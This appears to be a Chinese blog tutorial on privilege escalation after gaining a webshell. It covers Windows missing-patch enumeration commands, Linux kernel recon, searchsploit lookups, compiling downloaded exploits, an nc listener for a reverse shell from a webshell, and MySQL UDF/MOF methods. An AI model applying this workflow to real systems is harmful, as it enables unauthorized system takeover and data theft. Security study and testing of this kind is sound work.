提权

当我们拿到WebShell 之后,下一步干什么?
当然是权限提升啊!

简介

通过这些最初的漏洞利用途径,攻击者将获得一定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得比最初更多的权限,以期望从其他账户访问敏感信息,甚至或者获得对整个系统的完全管理控制。当攻击者以这种方式扩大其最初的未经授权访问的权限时,我们将其行为称为权限提升攻击。

水平权限提升(越权)

我们假设攻击者已经获得了在线银行账户的访问权限,他的目的是窃取金钱,但他从这一账户中窃取的金钱并不多。这时,他就会寻找信息或者尝试各种漏洞利用途径来获得对其他账户的访问权限。这称之为水平权限提升,因为攻击者是在具有相似权限的账户中横向移动。

垂直权限提升

通常攻击者的动机是完全控制计算机系统,以便可以任意使用系统。当攻击者首先从被攻击的用户账户开始并能够将其拥有的单一用户扩大或提升完全管理权限或“根”权限时,我们称这类攻击为垂直权限提升。

分类

  • Windows 权限提升
  • Linux 权限提升

Windows 权限提升

提权方式

  1. 操作系统漏洞提权
  2. 第三方服务提权

操作系统权限提升

  • systeminfo
  • exp

2003

systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type
C:\Windows\Temp\a.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:\Windows\Temp\a.txt

提权_第1张图片

2003 以上
systeminfo>C:\Windows\Temp\a.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type
C:\Windows\Temp\a.txt|@find /i “%i”|| @echo %i Not Installed!)&del /f /q /a
C:\Windows\Temp\a.txt
提权_第2张图片

操作系统提权

根据没有修补的补丁号码,上网找利用程序,直接提权即可。
http://www.7kb.org/138.html
提权—Windows 权限提升

2003
提权_第3张图片
提权_第4张图片

MSSQL 提权

获得sa 用户密码
提权_第5张图片

MySQL 提权

  1. UDF 提权
  2. MOF 提权

提权—Linux 权限提升

获取操作系统版本号

1、拿webshell
2、获得内核版本

  • cat /etc/issue
  • cat /etc/*-release
  • cat /etc/lsb-release
  • cat /etc/redhat-release
  • cat /proc/version
  • uname -a
  • uname -mrs
  • rpm -q kernel
  • dmesg | grep Linux
  • ls /boot | grep vmlinuz

3、漏洞查找工具searchsploit

  • searchsploit -w Ubuntu 14.04
  • searchsploit -w Centos 7
  • searchsploit -w windows 2003

4、打开链接,下载exp到可执行目录
5、gcc编译生成可执行程序gcc xxx.c -o newname
6、生成交互式shell,用dama.php反向链接
nc -l -v -n -p 12666
7、执行exp

第三方软件提权

  1. mysql:udf提权udf.dll(udf.so)
  2. mysql:system()直接执行系统命令

你可能感兴趣的:(网络安全)